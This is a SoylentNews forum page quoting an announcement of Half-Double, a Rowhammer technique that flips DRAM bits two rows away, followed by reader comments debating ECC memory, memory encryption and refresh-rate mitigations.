SoylentNews is people
SoylentNews
Introducing Half-Double: New hammering technique for DRAM Rowhammer bug:
Today, we are sharing details around our discovery of Half-Double, a new Rowhammer technique that capitalizes on the worsening physics of some of the newer DRAM chips to alter the contents of memory.
[...] As DDR4 became widely adopted, it appeared as though Rowhammer had faded away thanks in part to these built-in defense mechanisms. However, in 2020, the TRRespass paper showed how to reverse-engineer and neutralize the defense by distributing accesses, demonstrating that Rowhammer techniques are still viable. Earlier this year, the SMASH research went one step further and demonstrated exploitation from JavaScript, without invoking cache-management primitives or system calls.
Traditionally, Rowhammer was understood to operate at a distance of one row: when a DRAM row is accessed repeatedly (the "aggressor"), bit flips were found only in the two adjacent rows (the "victims"). However, with Half-Double, we have observed Rowhammer effects propagating to rows beyond adjacent neighbors, albeit at a reduced strength. Given three consecutive rows A, B, and C, we were able to attack C by directing a very large number of accesses to A, along with just a handful (~dozens) to B. Based on our experiments, accesses to B have a non-linear gating effect, in which they appear to "transport" the Rowhammer effect of A onto C. Unlike TRRespass, which exploits the blind spots of manufacturer-dependent defenses, Half-Double is an intrinsic property of the underlying silicon substrate. This is likely an indication that the electrical coupling responsible for Rowhammer is a property of distance, effectively becoming stronger and longer-ranged as cell geometries shrink down. Distances greater than two are conceivable.
(Score: 2, Interesting) by Mojibake Tengu on Wednesday May 26 2021, @07:40AM (2 children)
Late chronically bad and wrong design of hardware is a symptom of both cultural and knowledge decadence at large.
If you continue to push optimization of economics for money income, and keep ignore fundamental qualities of technological constructs, at end you will get society with piles of money somewhere but no usable technology at all anywhere. Worse, before that convergent limit happens, you can't even predict the synergy of many wrong designs leading to collapse of particular structures in technology constructs depending on those wrong designs.
Those who'll realize this in time and manage to evade such madness will pwn the planet for themselves.
The edge of 太玄 cannot be defined, for it is beyond every aspect of design
(Score: 0) by Anonymous Coward on Wednesday May 26 2021, @07:52AM (1 child)
I suggest to publish your thoughts in the "Quantum Mechanical Journal of Societal Transformation".
(Score: 1, Funny) by Anonymous Coward on Thursday May 27 2021, @01:26AM
Or Deep Thoughts with Jack Handy
(Score: 1) by shrewdsheep on Wednesday May 26 2021, @07:59AM (2 children)
I am wondering whether encrypting or rather transforming memory could be a solution. If memory is encrypted (let's say per row) and the key is changed with every memory refresh, wouldn't that solve row-hammer? The "encryption" could be as simple as XOR-ing with a random key which could also be short. Maybe, even a single bit would be enough, indicating whether memory is stored plain or bit-flipped.
(Score: 1, Informative) by Anonymous Coward on Wednesday May 26 2021, @08:22AM (1 child)
ECC memory is a better solution. It both detects the attack in a way you could act on and corrects them (ex: your OS could notice that you have high ram error rates and take action before you get uncorrected errors, possibly including throttling the process causing the issue and/or reporting the attempted attack to the user)
You can blame Intel's market segmentation efforts for causing ECC to basically not exist in the consumer space.
Memory encryption would could help as well (and there is tech to do that in some modern CPUs)
(Score: 0) by Anonymous Coward on Wednesday May 26 2021, @10:33AM
If you look at the papers, ECC is not foolproof either. There are mitigation that do work for rowhammer type attacks that do work and some are even in later versions of the JEDEC specs. The problem, as Trespass showed, is that manufacturers would rather not follow them to maintain their speed advantage, however slight it is on synthetic benchmarks.
(Score: 2) by bzipitidoo on Wednesday May 26 2021, @08:23AM (4 children)
How about dealing with this by adding a new item on the hardware end of things, RAM that is slower, but much more secure? Wouldn't be all that different from all the caching that is done now. And we've already wandered down the path of specialized memory, with, for instance, GDDR RAM for graphics.
This "secure RAM" (SSDR, for Secure Single Data Rate?) would zero itself when freed (and have means of tracking whether it is allocated or not), as well as not suffer from Rowhammer. Because, let's face it, most activity simply doesn't need any security from Rowhammer, it's only the handling of passwords and such like sensitive data that needs to be done securely. 16 megabytes should be way more than enough RAM to handle a few passwords and a login utility.
(Score: 1, Interesting) by Anonymous Coward on Wednesday May 26 2021, @09:02AM (3 children)
I think my chosen interval reduction only reduces the row hammer error rate by a factor of about a thousand. In practice my DRAM is probably older and "weaker" so go figure...
ECC is helpful but in theory there are ECC attacks too. That said, I doubt attempts to flip bits would be perfect the first time round. So if your system alerts you to ECC issues then you should notice row hammer attacks. Whether you notice them in time is another issue.
I suspect a combination of ECC and refresh interval reduction should make things much harder for the attacker.
(Score: 2) by RS3 on Wednesday May 26 2021, @05:05PM (2 children)
I'm curious what kind of system allows you to vary RAM refresh rate. Is that in BIOS/UEFI, or do you have a utility?
Did you run memtest86?
(Score: 2, Informative) by jurov on Wednesday May 26 2021, @05:53PM (1 child)
Yes, on desktop mainboards it is usually possible to configure of DRAM clock and timing. In BIOS setup.
(Score: 2) by RS3 on Friday June 04 2021, @08:08AM
I'm not sure I'd say "usually". Aftermarket ones usually do, and that's part of their appeal, but OEMs like to lock most of that stuff down. Well, by "OEM" I mean major names like Dell, HP, Lenovo, etc. Alienware probably lets you tweak up a storm. Are you aware of any major label computers that let you make any significant changes to RAM timing, bus speeds, etc? Maybe there are more than I'm aware of...
(Score: 2) by FatPhil on Wednesday May 26 2021, @01:28PM
Were the kids not told to practice safe hex?
Great minds discuss ideas; average minds discuss events; small minds discuss people; the smallest discuss themselves
(Score: 0) by Anonymous Coward on Wednesday May 26 2021, @05:58PM (1 child)
The only thing I know about this is from what I see on headlines. Is this just a memory corrupting thing, or is it an exploit where one can one flip adjacent memory bits such that one could execute code? That's the part of the big picture that I don't understand.
(Score: 0) by Anonymous Coward on Thursday May 27 2021, @10:24AM
Right now, it is just theoretical because it is harder to implement. However, there were those who claimed the original Rowhammer was and would always be just theoretical. But now Rowhammer is a very real threat to security to both the server space and the home user. Usually it gives privilege escalation but ACE is possible too.